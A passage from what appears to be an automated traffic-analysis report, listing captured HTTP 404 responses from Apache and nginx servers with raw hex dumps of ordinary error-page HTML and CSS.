3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:45 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:47 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 11:54:50 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:10 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:12 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 03 Sep 2024 11:55:15 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 